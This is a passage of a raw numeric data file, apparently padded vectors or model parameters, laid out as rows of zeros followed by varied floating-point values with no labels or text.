0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.74, -0.3972, 1.798, 0.0997, -0.1427, -0.5474, 0.02008, 0.394, 0.2366, -0.011665, 0.0521, -0.4521, -0.822, -0.007595, 0.00402, -0.0667, -0.004242, 0.2087, -0.02348, 0.0769, -0.13, -0.00989, 0.04855, 0.04715, 0.921, 0.004894, 0.02184, 0.04065, -0.2454, 2.547, -0.01274, 1.201, -0.3755, -0.1048, -0.0711, -0.3916, 0.3096, 0.0963, -0.508, 0.5366, 0.0607, 0.03467, 0.733, -0.1261, -0.1334, -0.07544, 0.3767, -0.007774, 0.2255, -0.735], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.031, -0.1558, -0.2489, -0.1857, 0.4028, -0.03906, -0.2815, 0.684, 1.059, -0.579, 0.2185, -0.2423, 0.981, -0.776, -0.01279, 0.1893, -0.6235, -0.718, -0.607, 2.18, -0.10126, -0.6064, 0.737, -0.3918, 0.7275, -0.588, -0.8345, -0.4736, 0.2512, 2.236, 0.579, 0.5884, 0.3506, -0.8643, 0.3784, -0.929, 0.0985, 0.02686, -0.1093, -2.037, -0.2107, 0.347, -0.12006, -1.049, 0.2764, -1.705, 0.06198, -0.01701, -0.03378, 0.4531], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1345, -1.45, 0.2927, -0.1875, -0.0232, -4.88, -0.1663, -0.8325, 0.6294, -0.2144, -2.328, 0.00883, 0.5083, -0.2079, 0.006733, -0.2983, 0.1516, 0.03848, -0.01481, 0.522, 0.03464, 0.0873, -0.2947, 0.567, 1.136, 0.2118, -0.4182, 0.4287, -0.3293, 2.61, -1.129, -0.45, -0.7646, -0.002655, -0.0321, 1.381, -2.457, 0.06158, -0.7744, -0.6665, 0.396, 0.1708, -0.2035, 0.0846, 0.4783, 0.0936, 0.02133, 0.0103, 0.5757, -0.0448], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2213, -0.4622, -1.046, -0.0847, -0.0863, -0.6655, 0.0081, -0.04758, 1.68, -0.0881, 0.2769, -0.3052, -0.10645, -0.02095, -0.02211, -0.03925, 0.01566, -0.0884, -0.2654, 0.4954, 0.01588, -0.0314, 0.001894, 0.2014, 0.428, 0.0009522, -0.03262, -0.03287, -0.3113, 0.836, 0.03848, 0.1469, -0.2744, -0.05612, 0.1101, 0.3933, -0.3975, -0.2905, 0.128, -0.848, -0.1539, 0.0874, 0.1632, -0.0561, 0.1959, 0.078, 0.2505, -0.02383, 0.0884, -0.06058], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3838, 0.2006, -0.1642, -0.12146, 0.004738, -0.725, 0.0675, -0.19, -0.0638, 0.1569, 0.012566, 0.467, 0.1498, 0.05362, -0.017, -0.0708, 0.0957, 0.0233, 0.403, -0.271, 0.03372, 0.147, -0.024, 0.1649, -0.6084, 0.2117, 0.564, 0.06696, 0.3945, -0.1282, -0.1449, -0.2054, -0.06097, 0.0378, 0.08044, 0.3315, -0.4463, -0.161, 0.0678, 0.2068, -0.03604, 0.02005, -0.4434, 0.1511, 0.0418, 0.166, -0.4492, -0.03915, -0.01478, 0.04803], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.404, -0.04193, 1.418, -0.765, -2.322, 0.612, 1.072, 0.6533, 0.1669, -0.487, -0.3237, -0.5293, -0.1656, 0.0008044, 0.03333, -0.1257, -0.635, -0.3716, 0.2644, 0.683, -0.2279, 0.1151, -0.045, 0.2234, 0.651, 0.1284, -0.03372, -0.59, 0.333, -1.617, 0.6533, -0.02539, 0.1305, -0.399, -0.089, 0.1768, 0.2832, -0.0913, -0.291, -1.134, 0.03946, 0.1874, 1.293, -1.288, -0.912, 0.394, 0.794, -0.02904, 0.391, 0.176], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.259, 0.9536, 0.359, -0.1282, -0.193, -1.101, 0.671, -1.449, -0.449, 0.11163, 0.4211, 1.454, -0.292, -1.473, 0.006615, -0.1126, -0.6694, 0.1055, -0.4246, 1.98, -1.366, -3.412, 0.3887, 0.3555, 0.3525, -0.7656, 0.518, -0.05896, -0.544, 0.0807, 0.3464, 0.4214, -0.1326, -1.232, -1.307, -0.2134, 0.7275, 0.0965, -1.1455, 2.127, 0.9097, 0.7764, 1.376, -0.4, 0.2365, -0.04486, 0.9253, -0.00969, 0.098, -3.746], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1444, 0.9443, -6.523, -0.1407, -0.7715, 0.3613, -0.3298, -1.096, -3.531, -1.624, 5.48, -0.491, 0.1609, -1.339, -0.03616, 0.308, -0.3884, -4.445, -0.08154, 2.537, -1.547, 0.9126, -0.2517, 3.08, -2.832, -5.13, 1.787, -0.7803, 3.467, 0.1228, 0.789, -1.21, -0.426, 0.2961, 0.2231, -1.072, -2.486, 2.047, 0.9404, 0.4192, -2.84, 3.348, 0.8726, -5.29, 2.404, -0.9644, -8.4, -0.0394, -4.035, -3.316], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.217, 0.4316, 0.101, 0.677, -0.2393, -0.644, 0.4521, 0.1492, 0.575, 0.5396, -1.142, -0.0389, 0.4172, -2.52, 0.0329, -0.1294, -6.2, 0.5566, -3.084, -0.4744, -0.5786, -0.0792, -1.551, 0.805, -0.3484, -0.5674, 0.01196, -0.0992, -1.731, 1.929, -0.2255, -0.1646, -0.0873, -0.2018, -0.05966, 0.4192, -0.3245, 0.7837, -0.1709, -0.1466, 0.3152, -0.1924, 0.45, -1.289, -1.843, 0.3235, 0.0855, 0.03017, 0.2559, -2.365], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0652, 0.1316, 0.4553, -0.2382, -0.1658, 0.59, 0.1652, 0.2241, -0.0584, -0.1459, -0.1744, -0.2139, -0.08594, -0.06525, -0.003769, -0.0918, -0.0689, 0.03415, -0.1527, 0.4773, 0.08374, 0.0368, -0.07263, 0.0753, 0.1711, 0.005497, -0.2335, -0.12, -0.0685, -12.836, -0.8804, -0.1637, 0.03934, -0.1818, -0.0817, -0.2559, -0.2188, -0.2966, 0.228, -0.3892, 0.03876, 0.1559, -0.1113, 0.0887, 0.0901, 0.002272, 0.03506, 0.0261, 0.382, 0.2244], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.468, -0.2856, -1.41, -1.451, -5.94, 1.388, -0.731, 0.884, -0.8184, -0.2512, 1.523, -0.854, 0.2496, -0.09784, 0.01634, -0.05917, 0.02083, -3.04, -0.00947, 1.327, -1.991, -0.3855, -0.01095, -0.666, -1.026, 0.0678, -0.2551, -0.2083, 0.5693, 0.0506, 0.0719, 0.2024, -0.1389, -0.3398, 0.08777, 0.545, -1.296, -0.76, -0.7974, -1.092, -1.323, 0.9536, -0.3257, 1.355, 0.649, -2.729, 0.5776, -0.03583, 0.5703, -0.3855], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.283, 1.681, 1.076, -0.621, 0.0435, 0.2966, 1.204, -0.2445, 0.9683, -0.1262, 1.028, 0.749, -1.605, -0.3154, -0.03123, -0.1398, 0.11743, 0.1366, 0.0987, 1.658, 0.3718, -0.3513, -0.0299, -0.2288, -0.408, 0.0793, -0.1915, -0.341, 0.777, 0.793, -1.126, 0.2861, -0.6597, 0.1995, 0.113, -0.501, -0.4814, 1.098, 0.01782, 0.437, -0.03934, -0.2213, 0.565, -0.0698, -0.1749, 0.214, 0.3464, -0.04623, -0.3735, -0.3787], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02821, 0.6553, -1.925, -4.43, -3.766, 1.634, -0.5127, 0.56, -0.4368, 0.2837, -0.04706, -8.91, -0.438, -0.01651, -0.01994, -0.2021, 0.115, 0.10266, 0.00821, -0.1527, 0.909, -0.02728, -4.96, 0.0435, 0.1056, -0.02876, 0.0718, -0.2449, -0.000863, -0.7393, 0.11957, -0.4678, -2.816, -0.08765, -0.00488, 0.6987, 0.928, -1.059, 0.1455, 1.043, -0.04678, -1.13, 0.725, 1.469, -5.914, -0.0759, -1.922, -0.00736, -0.1659, -3.822], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2421, -0.01435, 0.829, -0.9624, 0.05988, 0.004295, 0.2957, 0.1569, 0.1038, -0.2556, -0.431, 0.04742, -0.7427, -0.006886, 0.00225, -0.11053, -0.711, 0.07874, 0.1509, 0.007904, -0.1338, 0.01569, -0.321, 0.4077, 0.4407, -1.042, -0.3755, -0.02628, 0.8174, -0.5073, -0.1229, -0.10535, 0.12146, -0.2394, -0.4268, 0.2754, 0.277, 0.11743, 0.10034, 0.2393, -0.0685, 0.2822, 0.7715, -0.7046, 0.2197, -0.3, 0.7915, 0.0347, 0.2693, -0.4287], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6846, -1.239, -0.267, 1.614, 0.1421, -0.921, -0.4517, -1.287, -1.088, 0.4763, 0.563, -1.354, -0.12036, -1.451, 0.01065, 0.05038, -3.22, 0.226, -1.326, -0.5996, -0.386, 0.3174, -0.694, 0.6284, 1.403, -0.7783, -0.862, 0.4128, -1.359, 0.99, -1.395, 0.3074, 0.1984, 0.4104, -0.3335, -1.095, 1.043, -0.8716, 0.2396, -4.31, -0.2556, -1.113, -0.5986, -0.9395, 0.1285, 0.6006, -0.771, 0.04688, 0.3994, -1.138], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1214, 0.08875, 0.03714, 0.1184, -0.1936, -0.485, -0.1667, -0.0867, 0.8896, -0.1371, 0.06024, -0.4348, 0.0403, -0.2054, 0.04868, -0.009186, -0.2363, -0.0637, 0.0847, -0.02806, -0.0873, 0.02519, -0.004154, -0.1091, 0.3213, -0.1721, -0.3025, 0.0504, 0.0394, -0.207, -0.0905, 0.2374, 0.04007, -0.2098, -0.06198, -0.218, 0.1278, 0.11285, 0.001713, -0.11847, -0.0661, 0.02953, 0.456, -0.2964, -0.1829, -0.003365, 0.1837, 0.03934, 0.1737, 0.08673], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03717, 0.03342, 0.1619, -0.2001, 0.05426, -2.002, 0.219, -0.1167, -0.05847, 0.07135, -0.3516, 0.594, 0.1295, -0.2418, 0.0093, 0.00307, 0.1194, 0.10547, 0.2489, 0.572, 0.2534, -0.0334, -0.06323, 0.1497, 0.4722, 0.1405, 0.1562, -0.01797, 0.3528, 1.396, -5.105, -0.706, -0.4812, 0.04092, 0.001941, -0.5015, 0.03683, 0.3828, 0.08856, -0.1566, 0.0869, -0.65, -0.266, 0.07166, 0.1003, 0.02434, -0.1725, 0.04178, -0.01819, -0.0945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5254, -0.297, 0.67, -0.2299, -0.00759, -0.5386, -0.05942, 1.118, -2.041, 0.666, 0.11676, -0.1716, -1.245, -1.808, 0.006905, 0.1287, 0.2427, 0.1743, 1.086, 1.631, -0.639, -0.217, -0.04913, 0.2976, -0.5635, -0.1272, 0.02922, -0.86, 3.729, -11.61, 0.9443, -0.8926, 0.6226, -0.0796, -0.05978, 0.1783, 0.2234, 0.7876, 0.3057, -0.1785, 0.2886, -0.699, 0.4285, 0.2114, -1.5, 0.7344, -0.1624, 0.024, -0.4026, 0.2937], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06168, -0.5225, -0.1754, -0.05722, -0.295, 0.8477, 0.6416, 0.2659, 0.1603, 0.134, 0.1008, -0.129, 0.371, -0.3242, 0.05774, -0.11035, -0.4138, -0.3516, -0.4504, 0.289, -0.4253, -0.4844, -0.11694, -0.2026, 0.11945, -0.567, -0.1644, -0.2488, -0.6763, 0.4382, -0.0689, 0.0413, -0.0402, -0.481, -0.1093, -0.1761, 0.4336, 0.1231, -0.11316, 0.7466, -0.318, 0.3455, 0.384, -0.2861, 0.1356, -0.2455, 0.3396, -0.02345, 0.479, -0.02455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03333, -0.4202, 0.3958, 0.1632, 0.10876, -0.583, 0.02098, -0.1841, -0.02455, 0.04037, 0.0374, 0.05597, 0.26, 0.3523, 0.003504, -0.007835, 0.1206, 0.0725, 0.08203, -0.157, 0.004898, 0.1487, 0.001427, 0.11194, 0.3406, 0.07245, -0.09595, -0.1527, 0.0844, 0.2795, -0.9253, 0.001656, -0.00794, 0.1821, 0.06683, -0.4673, 0.0748, -0.01743, -0.0757, -0.2852, 0.05005, -0.10706, -0.402, 0.1489, 0.2668, 0.1465, -0.11646, 0.009315, 0.0834, 0.1548], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3477, -0.3274, 0.6055, 0.0714, -0.1425, 0.456, 0.541, 0.02103, -0.02684, -0.02525, 0.05542, -0.194, -0.193, 0.388, 0.05255, 0.07837, -0.5845, 0.1301, -0.4216, 0.504, -0.0926, -0.1143, -0.0689, 0.06976, 0.639, -0.129, -0.0844, -0.4978, -0.0927, 1.916, 0.0809, -0.0646, 0.03061, -0.1769, -0.1753, 0.1139, 0.649, 0.04956, -0.2151, 0.03943, -0.004787, 0.1109, -0.3567, -0.2383, -0.07825, 0.1569, 0.507, -0.0345, 0.3525, -0.3896], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2255, 0.518, 0.5586, -0.515, 0.0242, -0.4114, 0.533, 0.1759, 0.6553, 0.2854, -0.2197, -0.5786, -0.08435, -0.5015, -0.02182, -0.0432, -1.085, 0.05023, -0.787, 1.111, 0.0573, 0.003563, -0.794, 0.1033, 0.3977, -0.3015, -0.2974, -0.339, 0.827, 1.69, -0.0982, 0.2822, 0.1626, -0.2083, -0.0778, 0.875, -0.5146, 0.5176, 0.05725, 0.9478, 0.0791, 0.569, 0.1824, 0.2913, 0.0768, 0.1411, 0.5527, -0.02766, 0.0935, -0.948], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.159, -0.083, -0.524, 1.971, -1.271, 0.5483, 0.3438, -0.3967, -1.191, 0.409, -2.064, -0.2026, -0.06335, -1.193, 0.014084, 0.08655, -4.492, 1.109, -2.26, -0.03235, -0.744, -1.118, -2.43, 0.85, 0.554, -0.67, 0.37, -0.2206, -3.86, -0.824, 0.2114, -0.3035, -0.1169, -1.295, -0.733, -0.1009, 0.694, 1.192, -1.391, -0.2278, -0.697, 0.505, -0.9907, -2.965, -6.156, 0.533, -0.561, -0.009895, -0.02072, -2.564], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.786, -0.3286, 0.3745, 1.144, 1.198, 2.084, 0.1362, -0.1063, -0.2186, 0.5933, 0.03915, 0.9033, -0.9473, -4.92, 0.02597, 0.3386, -1.585, -0.6396, -2.844, -0.155, -0.6772, -0.8643, -0.91, 0.802, -1.952, -0.9727, -1.21, -0.6797, 0.1302, 1.098, 0.1765, -0.514, -0.3555, -1.221, 0.347, -0.2856, 1.886, 0.1663, -2.408, 0.68, -0.7114, 0.6587, -0.3303, -2.697, -3.184, -0.593, -3.799, 0.00861, -0.9175, 1.34], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1714, 0.0686, 1.149, 0.2344, -4.703, 1.376, 0.1985, 0.08325, 0.82, -0.3396, 0.2957, -1.424, -0.01132, 0.536, -0.00634, 0.02481, -0.6055, 0.02472, -0.4695, -0.6616, 0.2284, 0.01317, 0.126, 0.334, 1.591, -0.439, 0.2502, 0.00279, 0.1553, 2.352, 0.2129, -0.04434, -0.361, -0.5347, -0.03476, -0.3657, 0.3337, -0.256, -0.1674, 0.02158, 0.4539, 0.0556, 0.1118, -1.694, -0.6543, -0.176, -0.6304, -0.04434, 0.2239, -0.2593], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1024, -0.674, 0.5, -0.000298, 0.08624, 0.1516, 0.06097, -0.0619, 0.0397, -0.08514, -0.1737, -0.1921, 0.1829, 0.02728, -0.001123, 0.01107, 0.146, -0.141, 0.04373, 0.1439, 0.010735, -0.213, 0.1213, 0.00723, 0.4182, 0.12115, 0.05743, -0.02751, -0.09283, -0.259, 0.1595, -0.10614, -0.05853, 0.10516, 0.07587, -0.6504, 0.2028, -0.10345, 0.1761, -0.7383, 0.2583, -0.01898, -0.0925, 0.2322, -0.1266, -0.1786, 0.0003986, 0.01215, -0.0832, 0.2734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0774, -2.744, 3.426, -0.245, -0.05502, 0.08154, 0.4956, -0.07385, 1.632, -0.2957, -0.3577, -1.988, 0.282, -1.256, 0.0056, 0.4001, -1.0625, -0.311, -0.26, 0.374, -0.2664, -0.414, -0.2026, 0.303, 1.846, -0.4658, 0.502, -0.2146, 0.8687, 5.86, 0.291, 0.4915, -0.6777, -0.4172, -0.242, -2.057, 0.1608, -0.514, 0.9595, -1.355, 1.557, 1.108, -0.04874, -1.605, -1.471, -0.5747, -0.9272, -0.0397, -0.51, -1.17], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04657, -1.367, 0.6343, 0.1729, 0.1094, -0.9946, -0.04388, -0.468, -0.5986, -0.0573, -0.2341, 0.00893, -0.0973, 0.4543, 0.02791, -0.02081, 0.2103, 0.1986, 0.02095, 0.04187, 0.1503, 0.33, 0.01375, 0.3567, 0.6445, 0.09796, -0.2288, -0.293, 0.4404, -0.8867, -0.859, 0.1481, 0.03525, 0.2489, 0.03928, -1.106, -0.006046, -0.08234, -0.05017, 0.07794, 0.005054, -0.1785, -0.73, 0.1587, 0.5415, 0.2856, -0.4597, 0.000602, 0.2339, 0.1744], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 